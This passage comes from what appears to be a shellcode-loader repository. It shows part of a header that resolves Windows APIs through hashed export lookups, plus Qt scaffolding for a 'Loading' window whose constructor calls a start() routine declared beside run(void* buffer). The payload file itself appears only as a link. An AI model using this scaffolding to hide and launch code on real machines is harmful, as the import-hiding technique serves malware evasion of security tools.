const win::IMAGE_EXPORT_DIRECTORY* ied() const noexcept 400 | { 401 | return _ied; 402 | } 403 | 404 | LAZY_IMPORTER_FORCEINLINE const char* name(size_type index) const noexcept 405 | { 406 | return reinterpret_cast( 407 | _base + reinterpret_cast( 408 | _base + _ied->AddressOfNames)[index]); 409 | } 410 | 411 | LAZY_IMPORTER_FORCEINLINE const char* address(size_type index) const noexcept 412 | { 413 | const auto* const rva_table = 414 | reinterpret_cast(_base + _ied->AddressOfFunctions); 415 | 416 | const auto* const ord_table = reinterpret_cast( 417 | _base + _ied->AddressOfNameOrdinals); 418 | 419 | return _base + rva_table[ord_table[index]]; 420 | } 421 | 422 | LAZY_IMPORTER_FORCEINLINE bool is_forwarded( 423 | const char* export_address) const noexcept 424 | { 425 | const auto ui_ied = reinterpret_cast(_ied); 426 | return (export_address > ui_ied && export_address < ui_ied + _ied_size); 427 | } 428 | }; 429 | 430 | struct safe_module_enumerator { 431 | using value_type = const detail::win::LDR_DATA_TABLE_ENTRY_T; 432 | value_type* value; 433 | value_type* head; 434 | 435 | LAZY_IMPORTER_FORCEINLINE safe_module_enumerator() noexcept 436 | : safe_module_enumerator(ldr_data_entry()) 437 | {} 438 | 439 | LAZY_IMPORTER_FORCEINLINE 440 | safe_module_enumerator(const detail::win::LDR_DATA_TABLE_ENTRY_T* ldr) noexcept 441 | : value(ldr->load_order_next()), head(value) 442 | {} 443 | 444 | LAZY_IMPORTER_FORCEINLINE void reset() noexcept 445 | { 446 | value = head->load_order_next(); 447 | } 448 | 449 | LAZY_IMPORTER_FORCEINLINE bool next() noexcept 450 | { 451 | value = value->load_order_next(); 452 | 453 | return value != head && value->DllBase; 454 | } 455 | }; 456 | 457 | struct unsafe_module_enumerator { 458 | using value_type = const detail::win::LDR_DATA_TABLE_ENTRY_T*; 459 | value_type value; 460 | 461 | LAZY_IMPORTER_FORCEINLINE unsafe_module_enumerator() noexcept 462 | : value(ldr_data_entry()) 463 | {} 464 | 465 | LAZY_IMPORTER_FORCEINLINE void reset() 
noexcept { value = ldr_data_entry(); } 466 | 467 | LAZY_IMPORTER_FORCEINLINE bool next() noexcept 468 | { 469 | value = value->load_order_next(); 470 | return true; 471 | } 472 | }; 473 | 474 | // provides the cached functions which use Derive classes methods 475 | template 476 | class lazy_base { 477 | protected: 478 | // This function is needed because every templated function 479 | // with different args has its own static buffer 480 | LAZY_IMPORTER_FORCEINLINE static void*& _cache() noexcept 481 | { 482 | static void* value = nullptr; 483 | return value; 484 | } 485 | 486 | public: 487 | template 488 | LAZY_IMPORTER_FORCEINLINE static T safe() noexcept 489 | { 490 | return Derived::template get(); 491 | } 492 | 493 | template 494 | LAZY_IMPORTER_FORCEINLINE static T cached() noexcept 495 | { 496 | auto& cached = _cache(); 497 | if(!cached) 498 | cached = Derived::template get(); 499 | 500 | return (T)(cached); 501 | } 502 | 503 | template 504 | LAZY_IMPORTER_FORCEINLINE static T safe_cached() noexcept 505 | { 506 | return cached(); 507 | } 508 | }; 509 | 510 | template 511 | struct lazy_module : lazy_base> { 512 | template 513 | LAZY_IMPORTER_FORCEINLINE static T get() noexcept 514 | { 515 | Enum e; 516 | do { 517 | if(hash(e.value->BaseDllName, get_offset(OHP)) == get_hash(OHP)) 518 | return (T)(e.value->DllBase); 519 | } while(e.next()); 520 | return {}; 521 | } 522 | 523 | template 524 | LAZY_IMPORTER_FORCEINLINE static T in(Ldr ldr) noexcept 525 | { 526 | safe_module_enumerator e((const detail::win::LDR_DATA_TABLE_ENTRY_T*)(ldr)); 527 | do { 528 | if(hash(e.value->BaseDllName, get_offset(OHP)) == get_hash(OHP)) 529 | return (T)(e.value->DllBase); 530 | } while(e.next()); 531 | return {}; 532 | } 533 | 534 | template 535 | LAZY_IMPORTER_FORCEINLINE static T in_cached(Ldr ldr) noexcept 536 | { 537 | auto& cached = lazy_base>::_cache(); 538 | if(!cached) 539 | cached = in(ldr); 540 | 541 | return (T)(cached); 542 | } 543 | }; 544 | 545 | template 546 | struct 
lazy_function : lazy_base, T> { 547 | using base_type = lazy_base, T>; 548 | 549 | template 550 | LAZY_IMPORTER_FORCEINLINE decltype(auto) operator()(Args&&... args) const 551 | { 552 | #ifndef LAZY_IMPORTER_CACHE_OPERATOR_PARENS 553 | return get()(LAZY_IMPORTER_CPP_FORWARD(Args, args)...); 554 | #else 555 | return this->cached()(LAZY_IMPORTER_CPP_FORWARD(Args, args)...); 556 | #endif 557 | } 558 | 559 | template 560 | LAZY_IMPORTER_FORCEINLINE static F get() noexcept 561 | { 562 | // for backwards compatability. 563 | // Before 2.0 it was only possible to resolve forwarded exports when 564 | // this macro was enabled 565 | #ifdef LAZY_IMPORTER_RESOLVE_FORWARDED_EXPORTS 566 | return forwarded(); 567 | #else 568 | 569 | Enum e; 570 | 571 | do { 572 | #ifdef LAZY_IMPORTER_HARDENED_MODULE_CHECKS 573 | if(!e.value->DllBase || !e.value->FullDllName.Length) 574 | continue; 575 | #endif 576 | 577 | const exports_directory exports(e.value->DllBase); 578 | 579 | if(exports) { 580 | auto export_index = exports.size(); 581 | while(export_index--) 582 | if(hash(exports.name(export_index), get_offset(OHP)) == get_hash(OHP)) 583 | return (F)(exports.address(export_index)); 584 | } 585 | } while(e.next()); 586 | return {}; 587 | #endif 588 | } 589 | 590 | template 591 | LAZY_IMPORTER_FORCEINLINE static F forwarded() noexcept 592 | { 593 | detail::win::UNICODE_STRING_T name; 594 | forwarded_hashes hashes{ 0, get_hash(OHP) }; 595 | 596 | Enum e; 597 | do { 598 | name = e.value->BaseDllName; 599 | name.Length -= 8; // get rid of .dll extension 600 | 601 | if(!hashes.module_hash || hash(name, get_offset(OHP)) == hashes.module_hash) { 602 | const exports_directory exports(e.value->DllBase); 603 | 604 | if(exports) { 605 | auto export_index = exports.size(); 606 | while(export_index--) 607 | if(hash(exports.name(export_index), get_offset(OHP)) == hashes.function_hash) { 608 | const auto addr = exports.address(export_index); 609 | 610 | if(exports.is_forwarded(addr)) { 611 | hashes = 
hash_forwarded( 612 | reinterpret_cast(addr), 613 | get_offset(OHP)); 614 | 615 | e.reset(); 616 | break; 617 | } 618 | return (F)(addr); 619 | } 620 | } 621 | } 622 | } while(e.next()); 623 | return {}; 624 | } 625 | 626 | template 627 | LAZY_IMPORTER_FORCEINLINE static F forwarded_safe() noexcept 628 | { 629 | return forwarded(); 630 | } 631 | 632 | template 633 | LAZY_IMPORTER_FORCEINLINE static F forwarded_cached() noexcept 634 | { 635 | auto& value = base_type::_cache(); 636 | if(!value) 637 | value = forwarded(); 638 | return (F)(value); 639 | } 640 | 641 | template 642 | LAZY_IMPORTER_FORCEINLINE static F forwarded_safe_cached() noexcept 643 | { 644 | return forwarded_cached(); 645 | } 646 | 647 | template 648 | LAZY_IMPORTER_FORCEINLINE static F in(Module m) noexcept 649 | { 650 | if(IsSafe && !m) 651 | return {}; 652 | 653 | const exports_directory exports((const char*)(m)); 654 | if(IsSafe && !exports) 655 | return {}; 656 | 657 | for(unsigned long i{};; ++i) { 658 | if(IsSafe && i == exports.size()) 659 | break; 660 | 661 | if(hash(exports.name(i), get_offset(OHP)) == get_hash(OHP)) 662 | return (F)(exports.address(i)); 663 | } 664 | return {}; 665 | } 666 | 667 | template 668 | LAZY_IMPORTER_FORCEINLINE static F in_safe(Module m) noexcept 669 | { 670 | return in(m); 671 | } 672 | 673 | template 674 | LAZY_IMPORTER_FORCEINLINE static F in_cached(Module m) noexcept 675 | { 676 | auto& value = base_type::_cache(); 677 | if(!value) 678 | value = in(m); 679 | return (F)(value); 680 | } 681 | 682 | template 683 | LAZY_IMPORTER_FORCEINLINE static F in_safe_cached(Module m) noexcept 684 | { 685 | return in_cached(m); 686 | } 687 | 688 | template 689 | LAZY_IMPORTER_FORCEINLINE static F nt() noexcept 690 | { 691 | return in(ldr_data_entry()->load_order_next()->DllBase); 692 | } 693 | 694 | template 695 | LAZY_IMPORTER_FORCEINLINE static F nt_safe() noexcept 696 | { 697 | return in_safe(ldr_data_entry()->load_order_next()->DllBase); 698 | } 699 | 700 | template 
701 | LAZY_IMPORTER_FORCEINLINE static F nt_cached() noexcept 702 | { 703 | return in_cached(ldr_data_entry()->load_order_next()->DllBase); 704 | } 705 | 706 | template 707 | LAZY_IMPORTER_FORCEINLINE static F nt_safe_cached() noexcept 708 | { 709 | return in_safe_cached(ldr_data_entry()->load_order_next()->DllBase); 710 | } 711 | }; 712 | 713 | }} // namespace li::detail 714 | 715 | #endif // include guard 716 | -------------------------------------------------------------------------------- /Loading/Loading/main.cpp: -------------------------------------------------------------------------------- 1 | #include "Loading.h" 2 | #include 3 | 4 | int main(int argc, char *argv[]) 5 | { 6 | QApplication a(argc, argv); 7 | Loading w; 8 | w.show(); 9 | return a.exec(); 10 | } 11 | -------------------------------------------------------------------------------- /Loading/Loading/moc/moc_Loading.cpp: -------------------------------------------------------------------------------- 1 | /**************************************************************************** 2 | ** Meta object code from reading C++ file 'Loading.h' 3 | ** 4 | ** Created by: The Qt Meta Object Compiler version 67 (Qt 5.12.9) 5 | ** 6 | ** WARNING! All changes made in this file will be lost! 7 | *****************************************************************************/ 8 | 9 | #include "../../Loading.h" 10 | #include 11 | #include 12 | #if !defined(Q_MOC_OUTPUT_REVISION) 13 | #error "The header file 'Loading.h' doesn't include ." 14 | #elif Q_MOC_OUTPUT_REVISION != 67 15 | #error "This file was generated using the moc from 5.12.9. It" 16 | #error "cannot be used with the include files from this version of Qt." 
17 | #error "(The moc has changed too much.)" 18 | #endif 19 | 20 | QT_BEGIN_MOC_NAMESPACE 21 | QT_WARNING_PUSH 22 | QT_WARNING_DISABLE_DEPRECATED 23 | struct qt_meta_stringdata_Loading_t { 24 | QByteArrayData data[1]; 25 | char stringdata0[8]; 26 | }; 27 | #define QT_MOC_LITERAL(idx, ofs, len) \ 28 | Q_STATIC_BYTE_ARRAY_DATA_HEADER_INITIALIZER_WITH_OFFSET(len, \ 29 | qptrdiff(offsetof(qt_meta_stringdata_Loading_t, stringdata0) + ofs \ 30 | - idx * sizeof(QByteArrayData)) \ 31 | ) 32 | static const qt_meta_stringdata_Loading_t qt_meta_stringdata_Loading = { 33 | { 34 | QT_MOC_LITERAL(0, 0, 7) // "Loading" 35 | 36 | }, 37 | "Loading" 38 | }; 39 | #undef QT_MOC_LITERAL 40 | 41 | static const uint qt_meta_data_Loading[] = { 42 | 43 | // content: 44 | 8, // revision 45 | 0, // classname 46 | 0, 0, // classinfo 47 | 0, 0, // methods 48 | 0, 0, // properties 49 | 0, 0, // enums/sets 50 | 0, 0, // constructors 51 | 0, // flags 52 | 0, // signalCount 53 | 54 | 0 // eod 55 | }; 56 | 57 | void Loading::qt_static_metacall(QObject *_o, QMetaObject::Call _c, int _id, void **_a) 58 | { 59 | Q_UNUSED(_o); 60 | Q_UNUSED(_id); 61 | Q_UNUSED(_c); 62 | Q_UNUSED(_a); 63 | } 64 | 65 | QT_INIT_METAOBJECT const QMetaObject Loading::staticMetaObject = { { 66 | &QMainWindow::staticMetaObject, 67 | qt_meta_stringdata_Loading.data, 68 | qt_meta_data_Loading, 69 | qt_static_metacall, 70 | nullptr, 71 | nullptr 72 | } }; 73 | 74 | 75 | const QMetaObject *Loading::metaObject() const 76 | { 77 | return QObject::d_ptr->metaObject ? 
QObject::d_ptr->dynamicMetaObject() : &staticMetaObject; 78 | } 79 | 80 | void *Loading::qt_metacast(const char *_clname) 81 | { 82 | if (!_clname) return nullptr; 83 | if (!strcmp(_clname, qt_meta_stringdata_Loading.stringdata0)) 84 | return static_cast(this); 85 | return QMainWindow::qt_metacast(_clname); 86 | } 87 | 88 | int Loading::qt_metacall(QMetaObject::Call _c, int _id, void **_a) 89 | { 90 | _id = QMainWindow::qt_metacall(_c, _id, _a); 91 | return _id; 92 | } 93 | QT_WARNING_POP 94 | QT_END_MOC_NAMESPACE 95 | -------------------------------------------------------------------------------- /Loading/Loading/rcc/qrc_Loading.cpp: -------------------------------------------------------------------------------- 1 | /**************************************************************************** 2 | ** Resource object code 3 | ** 4 | ** Created by: The Resource Compiler for Qt version 5.12.9 5 | ** 6 | ** WARNING! All changes made in this file will be lost! 7 | *****************************************************************************/ 8 | 9 | #ifdef QT_NAMESPACE 10 | # define QT_RCC_PREPEND_NAMESPACE(name) ::QT_NAMESPACE::name 11 | # define QT_RCC_MANGLE_NAMESPACE0(x) x 12 | # define QT_RCC_MANGLE_NAMESPACE1(a, b) a##_##b 13 | # define QT_RCC_MANGLE_NAMESPACE2(a, b) QT_RCC_MANGLE_NAMESPACE1(a,b) 14 | # define QT_RCC_MANGLE_NAMESPACE(name) QT_RCC_MANGLE_NAMESPACE2( \ 15 | QT_RCC_MANGLE_NAMESPACE0(name), QT_RCC_MANGLE_NAMESPACE0(QT_NAMESPACE)) 16 | #else 17 | # define QT_RCC_PREPEND_NAMESPACE(name) name 18 | # define QT_RCC_MANGLE_NAMESPACE(name) name 19 | #endif 20 | 21 | #ifdef QT_NAMESPACE 22 | namespace QT_NAMESPACE { 23 | #endif 24 | 25 | #ifdef QT_NAMESPACE 26 | } 27 | #endif 28 | 29 | int QT_RCC_MANGLE_NAMESPACE(qInitResources_Loading)(); 30 | int QT_RCC_MANGLE_NAMESPACE(qInitResources_Loading)() 31 | { 32 | return 1; 33 | } 34 | 35 | int QT_RCC_MANGLE_NAMESPACE(qCleanupResources_Loading)(); 36 | int QT_RCC_MANGLE_NAMESPACE(qCleanupResources_Loading)() 37 
| { 38 | return 1; 39 | } 40 | 41 | namespace { 42 | struct initializer { 43 | initializer() { QT_RCC_MANGLE_NAMESPACE(qInitResources_Loading)(); } 44 | ~initializer() { QT_RCC_MANGLE_NAMESPACE(qCleanupResources_Loading)(); } 45 | } dummy; 46 | } 47 | -------------------------------------------------------------------------------- /Loading/Loading/uic/ui_Loading.h: -------------------------------------------------------------------------------- 1 | /******************************************************************************** 2 | ** Form generated from reading UI file 'Loading.ui' 3 | ** 4 | ** Created by: Qt User Interface Compiler version 5.12.9 5 | ** 6 | ** WARNING! All changes made in this file will be lost when recompiling UI file! 7 | ********************************************************************************/ 8 | 9 | #ifndef UI_LOADING_H 10 | #define UI_LOADING_H 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include 19 | 20 | QT_BEGIN_NAMESPACE 21 | 22 | class Ui_LoadingClass 23 | { 24 | public: 25 | QMenuBar *menuBar; 26 | QToolBar *mainToolBar; 27 | QWidget *centralWidget; 28 | QStatusBar *statusBar; 29 | 30 | void setupUi(QMainWindow *LoadingClass) 31 | { 32 | if (LoadingClass->objectName().isEmpty()) 33 | LoadingClass->setObjectName(QString::fromUtf8("LoadingClass")); 34 | LoadingClass->resize(600, 400); 35 | menuBar = new QMenuBar(LoadingClass); 36 | menuBar->setObjectName(QString::fromUtf8("menuBar")); 37 | LoadingClass->setMenuBar(menuBar); 38 | mainToolBar = new QToolBar(LoadingClass); 39 | mainToolBar->setObjectName(QString::fromUtf8("mainToolBar")); 40 | LoadingClass->addToolBar(mainToolBar); 41 | centralWidget = new QWidget(LoadingClass); 42 | centralWidget->setObjectName(QString::fromUtf8("centralWidget")); 43 | LoadingClass->setCentralWidget(centralWidget); 44 | statusBar = new QStatusBar(LoadingClass); 45 | statusBar->setObjectName(QString::fromUtf8("statusBar")); 46 | 
LoadingClass->setStatusBar(statusBar); 47 | 48 | retranslateUi(LoadingClass); 49 | 50 | QMetaObject::connectSlotsByName(LoadingClass); 51 | } // setupUi 52 | 53 | void retranslateUi(QMainWindow *LoadingClass) 54 | { 55 | LoadingClass->setWindowTitle(QApplication::translate("LoadingClass", "Loading", nullptr)); 56 | } // retranslateUi 57 | 58 | }; 59 | 60 | namespace Ui { 61 | class LoadingClass: public Ui_LoadingClass {}; 62 | } // namespace Ui 63 | 64 | QT_END_NAMESPACE 65 | 66 | #endif // UI_LOADING_H 67 | -------------------------------------------------------------------------------- /Loading/res/Loading.ico: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Loading/res/Loading.ico -------------------------------------------------------------------------------- /Loading_1.2/Loading.sln: -------------------------------------------------------------------------------- 1 |  2 | Microsoft Visual Studio Solution File, Format Version 12.00 3 | # Visual Studio Version 17 4 | VisualStudioVersion = 17.4.33110.190 5 | MinimumVisualStudioVersion = 10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Loading", "Loading.vcxproj", "{C430F35E-F396-494F-B5AA-43D8BA1A42F1}" 7 | EndProject 8 | Global 9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 10 | Debug|x86 = Debug|x86 11 | Release|x86 = Release|x86 12 | EndGlobalSection 13 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 14 | {C430F35E-F396-494F-B5AA-43D8BA1A42F1}.Debug|x86.ActiveCfg = Debug|Win32 15 | {C430F35E-F396-494F-B5AA-43D8BA1A42F1}.Debug|x86.Build.0 = Debug|Win32 16 | {C430F35E-F396-494F-B5AA-43D8BA1A42F1}.Release|x86.ActiveCfg = Release|Win32 17 | {C430F35E-F396-494F-B5AA-43D8BA1A42F1}.Release|x86.Build.0 = Release|Win32 18 | EndGlobalSection 19 | GlobalSection(SolutionProperties) = preSolution 20 | HideSolutionNode = FALSE 21 | 
EndGlobalSection 22 | GlobalSection(ExtensibilityGlobals) = postSolution 23 | SolutionGuid = {3FAB5FFE-9354-496A-9899-64C62FF2DB98} 24 | EndGlobalSection 25 | EndGlobal 26 | -------------------------------------------------------------------------------- /Loading_1.2/Loading/Loading.cpp: -------------------------------------------------------------------------------- 1 | #include "Loading.h" 2 | #include "code.h" 3 | 4 | Loading::Loading(QWidget *parent) 5 | : QMainWindow(parent) 6 | { 7 | ui.setupUi(this); 8 | start(); 9 | } 10 | 11 | Loading::~Loading() 12 | {} 13 | -------------------------------------------------------------------------------- /Loading_1.2/Loading/Loading.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "ui_Loading.h" 5 | 6 | class Loading : public QMainWindow 7 | { 8 | Q_OBJECT 9 | 10 | public: 11 | Loading(QWidget *parent = nullptr); 12 | ~Loading(); 13 | 14 | private: 15 | Ui::LoadingClass ui; 16 | }; 17 | -------------------------------------------------------------------------------- /Loading_1.2/Loading/code.cpp: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/SecurityAnalysts01/ShellcodeLoader/1ff79fb9e1b9ad4934da88d9db82494d81a851c0/Loading_1.2/Loading/code.cpp -------------------------------------------------------------------------------- /Loading_1.2/Loading/code.h: -------------------------------------------------------------------------------- 1 | 2 | #include 3 | #define DATA_SIZE 27136 4 | 5 | 6 | int start(); 7 | 8 | void run(void* buffer); 9 | -------------------------------------------------------------------------------- /Loading_1.2/Loading/lazy_importer.hpp: -------------------------------------------------------------------------------- 1 | /* 2 | * Copyright 2018-2022 Justas Masiulis 3 | * 4 | * Licensed under the Apache License, Version 2.0 (the "License"); 5 | * you may not 
use this file except in compliance with the License. 6 | * You may obtain a copy of the License at 7 | * 8 | * http://www.apache.org/licenses/LICENSE-2.0 9 | * 10 | * Unless required by applicable law or agreed to in writing, software 11 | * distributed under the License is distributed on an "AS IS" BASIS, 12 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 13 | * See the License for the specific language governing permissions and 14 | * limitations under the License. 15 | */ 16 | 17 | // === FAQ === documentation is available at https://github.com/JustasMasiulis/lazy_importer 18 | // * Code doesn't compile with errors about pointer conversion: 19 | // - Try using `nullptr` instead of `NULL` or call `get()` instead of using the overloaded operator() 20 | // * Lazy importer can't find the function I want: 21 | // - Double check that the module in which it's located in is actually loaded 22 | // - Try #define LAZY_IMPORTER_CASE_INSENSITIVE 23 | // This will start using case insensitive comparison globally 24 | // - Try #define LAZY_IMPORTER_RESOLVE_FORWARDED_EXPORTS 25 | // This will enable forwarded export resolution globally instead of needing explicit `forwarded()` calls 26 | 27 | #ifndef LAZY_IMPORTER_HPP 28 | #define LAZY_IMPORTER_HPP 29 | 30 | 31 | #define LI_FN(name) ::li::detail::lazy_function() 32 | 33 | #define LI_FN_DEF(name) ::li::detail::lazy_function() 34 | 35 | #define LI_MODULE(name) ::li::detail::lazy_module() 36 | 37 | #ifndef LAZY_IMPORTER_CPP_FORWARD 38 | #ifdef LAZY_IMPORTER_NO_CPP_FORWARD 39 | #define LAZY_IMPORTER_CPP_FORWARD(t, v) v 40 | #else 41 | #include 42 | #define LAZY_IMPORTER_CPP_FORWARD(t, v) std::forward( v ) 43 | #endif 44 | #endif 45 | 46 | #include 47 | 48 | #ifndef LAZY_IMPORTER_NO_FORCEINLINE 49 | #if defined(_MSC_VER) 50 | #define LAZY_IMPORTER_FORCEINLINE __forceinline 51 | #elif defined(__GNUC__) && __GNUC__ > 3 52 | #define LAZY_IMPORTER_FORCEINLINE inline __attribute__((__always_inline__)) 53 | 
#else 54 | #define LAZY_IMPORTER_FORCEINLINE inline 55 | #endif 56 | #else 57 | #define LAZY_IMPORTER_FORCEINLINE inline 58 | #endif 59 | 60 | 61 | #ifdef LAZY_IMPORTER_CASE_INSENSITIVE 62 | #define LAZY_IMPORTER_CASE_SENSITIVITY false 63 | #else 64 | #define LAZY_IMPORTER_CASE_SENSITIVITY true 65 | #endif 66 | 67 | #define LAZY_IMPORTER_STRINGIZE(x) #x 68 | #define LAZY_IMPORTER_STRINGIZE_EXPAND(x) LAZY_IMPORTER_STRINGIZE(x) 69 | 70 | #define LAZY_IMPORTER_KHASH(str) ::li::detail::khash(str, \ 71 | ::li::detail::khash_impl( __TIME__ __DATE__ LAZY_IMPORTER_STRINGIZE_EXPAND(__LINE__) LAZY_IMPORTER_STRINGIZE_EXPAND(__COUNTER__), 2166136261 )) 72 | 73 | namespace li { namespace detail { 74 | 75 | namespace win { 76 | 77 | struct LIST_ENTRY_T { 78 | const char* Flink; 79 | const char* Blink; 80 | }; 81 | 82 | struct UNICODE_STRING_T { 83 | unsigned short Length; 84 | unsigned short MaximumLength; 85 | wchar_t* Buffer; 86 | }; 87 | 88 | struct PEB_LDR_DATA_T { 89 | unsigned long Length; 90 | unsigned long Initialized; 91 | const char* SsHandle; 92 | LIST_ENTRY_T InLoadOrderModuleList; 93 | }; 94 | 95 | struct PEB_T { 96 | unsigned char Reserved1[2]; 97 | unsigned char BeingDebugged; 98 | unsigned char Reserved2[1]; 99 | const char* Reserved3[2]; 100 | PEB_LDR_DATA_T* Ldr; 101 | }; 102 | 103 | struct LDR_DATA_TABLE_ENTRY_T { 104 | LIST_ENTRY_T InLoadOrderLinks; 105 | LIST_ENTRY_T InMemoryOrderLinks; 106 | LIST_ENTRY_T InInitializationOrderLinks; 107 | const char* DllBase; 108 | const char* EntryPoint; 109 | union { 110 | unsigned long SizeOfImage; 111 | const char* _dummy; 112 | }; 113 | UNICODE_STRING_T FullDllName; 114 | UNICODE_STRING_T BaseDllName; 115 | 116 | LAZY_IMPORTER_FORCEINLINE const LDR_DATA_TABLE_ENTRY_T* 117 | load_order_next() const noexcept 118 | { 119 | return reinterpret_cast( 120 | InLoadOrderLinks.Flink); 121 | } 122 | }; 123 | 124 | struct IMAGE_DOS_HEADER { // DOS .EXE header 125 | unsigned short e_magic; // Magic number 126 | unsigned short 
e_cblp; // Bytes on last page of file 127 | unsigned short e_cp; // Pages in file 128 | unsigned short e_crlc; // Relocations 129 | unsigned short e_cparhdr; // Size of header in paragraphs 130 | unsigned short e_minalloc; // Minimum extra paragraphs needed 131 | unsigned short e_maxalloc; // Maximum extra paragraphs needed 132 | unsigned short e_ss; // Initial (relative) SS value 133 | unsigned short e_sp; // Initial SP value 134 | unsigned short e_csum; // Checksum 135 | unsigned short e_ip; // Initial IP value 136 | unsigned short e_cs; // Initial (relative) CS value 137 | unsigned short e_lfarlc; // File address of relocation table 138 | unsigned short e_ovno; // Overlay number 139 | unsigned short e_res[4]; // Reserved words 140 | unsigned short e_oemid; // OEM identifier (for e_oeminfo) 141 | unsigned short e_oeminfo; // OEM information; e_oemid specific 142 | unsigned short e_res2[10]; // Reserved words 143 | long e_lfanew; // File address of new exe header 144 | }; 145 | 146 | struct IMAGE_FILE_HEADER { 147 | unsigned short Machine; 148 | unsigned short NumberOfSections; 149 | unsigned long TimeDateStamp; 150 | unsigned long PointerToSymbolTable; 151 | unsigned long NumberOfSymbols; 152 | unsigned short SizeOfOptionalHeader; 153 | unsigned short Characteristics; 154 | }; 155 | 156 | struct IMAGE_EXPORT_DIRECTORY { 157 | unsigned long Characteristics; 158 | unsigned long TimeDateStamp; 159 | unsigned short MajorVersion; 160 | unsigned short MinorVersion; 161 | unsigned long Name; 162 | unsigned long Base; 163 | unsigned long NumberOfFunctions; 164 | unsigned long NumberOfNames; 165 | unsigned long AddressOfFunctions; // RVA from base of image 166 | unsigned long AddressOfNames; // RVA from base of image 167 | unsigned long AddressOfNameOrdinals; // RVA from base of image 168 | }; 169 | 170 | struct IMAGE_DATA_DIRECTORY { 171 | unsigned long VirtualAddress; 172 | unsigned long Size; 173 | }; 174 | 175 | struct IMAGE_OPTIONAL_HEADER64 { 176 | unsigned short 
Magic; 177 | unsigned char MajorLinkerVersion; 178 | unsigned char MinorLinkerVersion; 179 | unsigned long SizeOfCode; 180 | unsigned long SizeOfInitializedData; 181 | unsigned long SizeOfUninitializedData; 182 | unsigned long AddressOfEntryPoint; 183 | unsigned long BaseOfCode; 184 | unsigned long long ImageBase; 185 | unsigned long SectionAlignment; 186 | unsigned long FileAlignment; 187 | unsigned short MajorOperatingSystemVersion; 188 | unsigned short MinorOperatingSystemVersion; 189 | unsigned short MajorImageVersion; 190 | unsigned short MinorImageVersion; 191 | unsigned short MajorSubsystemVersion; 192 | unsigned short MinorSubsystemVersion; 193 | unsigned long Win32VersionValue; 194 | unsigned long SizeOfImage; 195 | unsigned long SizeOfHeaders; 196 | unsigned long CheckSum; 197 | unsigned short Subsystem; 198 | unsigned short DllCharacteristics; 199 | unsigned long long SizeOfStackReserve; 200 | unsigned long long SizeOfStackCommit; 201 | unsigned long long SizeOfHeapReserve; 202 | unsigned long long SizeOfHeapCommit; 203 | unsigned long LoaderFlags; 204 | unsigned long NumberOfRvaAndSizes; 205 | IMAGE_DATA_DIRECTORY DataDirectory[16]; 206 | }; 207 | 208 | struct IMAGE_OPTIONAL_HEADER32 { 209 | unsigned short Magic; 210 | unsigned char MajorLinkerVersion; 211 | unsigned char MinorLinkerVersion; 212 | unsigned long SizeOfCode; 213 | unsigned long SizeOfInitializedData; 214 | unsigned long SizeOfUninitializedData; 215 | unsigned long AddressOfEntryPoint; 216 | unsigned long BaseOfCode; 217 | unsigned long BaseOfData; 218 | unsigned long ImageBase; 219 | unsigned long SectionAlignment; 220 | unsigned long FileAlignment; 221 | unsigned short MajorOperatingSystemVersion; 222 | unsigned short MinorOperatingSystemVersion; 223 | unsigned short MajorImageVersion; 224 | unsigned short MinorImageVersion; 225 | unsigned short MajorSubsystemVersion; 226 | unsigned short MinorSubsystemVersion; 227 | unsigned long Win32VersionValue; 228 | unsigned long SizeOfImage; 229 | 
unsigned long SizeOfHeaders; 230 | unsigned long CheckSum; 231 | unsigned short Subsystem; 232 | unsigned short DllCharacteristics; 233 | unsigned long SizeOfStackReserve; 234 | unsigned long SizeOfStackCommit; 235 | unsigned long SizeOfHeapReserve; 236 | unsigned long SizeOfHeapCommit; 237 | unsigned long LoaderFlags; 238 | unsigned long NumberOfRvaAndSizes; 239 | IMAGE_DATA_DIRECTORY DataDirectory[16]; 240 | }; 241 | 242 | struct IMAGE_NT_HEADERS { 243 | unsigned long Signature; 244 | IMAGE_FILE_HEADER FileHeader; 245 | #ifdef _WIN64 246 | IMAGE_OPTIONAL_HEADER64 OptionalHeader; 247 | #else 248 | IMAGE_OPTIONAL_HEADER32 OptionalHeader; 249 | #endif 250 | }; 251 | 252 | } // namespace win 253 | 254 | struct forwarded_hashes { 255 | unsigned module_hash; 256 | unsigned function_hash; 257 | }; 258 | 259 | // 64 bit integer where 32 bits are used for the hash offset 260 | // and remaining 32 bits are used for the hash computed using it 261 | using offset_hash_pair = unsigned long long; 262 | 263 | LAZY_IMPORTER_FORCEINLINE constexpr unsigned get_hash(offset_hash_pair pair) noexcept { return ( pair & 0xFFFFFFFF ); } 264 | 265 | LAZY_IMPORTER_FORCEINLINE constexpr unsigned get_offset(offset_hash_pair pair) noexcept { return ( pair >> 32 ); } 266 | 267 | template 268 | LAZY_IMPORTER_FORCEINLINE constexpr unsigned hash_single(unsigned value, char c) noexcept 269 | { 270 | return static_cast( 271 | (value ^ ((!CaseSensitive && c >= 'A' && c <= 'Z') ? (c | (1 << 5)) : c)) * 272 | static_cast(16777619)); 273 | } 274 | 275 | LAZY_IMPORTER_FORCEINLINE constexpr unsigned 276 | khash_impl(const char* str, unsigned value) noexcept 277 | { 278 | return (*str ? 
khash_impl(str + 1, hash_single(value, *str)) : value); 279 | } 280 | 281 | /* Compile-time hash of a string literal: the per-build seed `offset` goes in the high 32 bits and the FNV-1a-style digest of `str` (xor, then multiply by 16777619 in hash_single) in the low 32 bits, so the runtime hash() functions can recompute with the same seed. The seed comes from __TIME__/__DATE__/__LINE__/__COUNTER__ (see LAZY_IMPORTER_KHASH), so the hash of a given API name differs per build and per call site; a fixed hash constant will not match across builds, and each LI_FN(name) expansion is a distinct type. */ LAZY_IMPORTER_FORCEINLINE constexpr offset_hash_pair khash( 282 | const char* str, unsigned offset) noexcept 283 | { 284 | return ((offset_hash_pair{ offset } << 32) | khash_impl(str, offset)); 285 | } 286 | 287 | /* Runtime counterpart of khash_impl for a NUL-terminated name (export names are char*; CharT is whatever the caller passes). Each unit is truncated to char before hashing, matching hash_single's parameter. 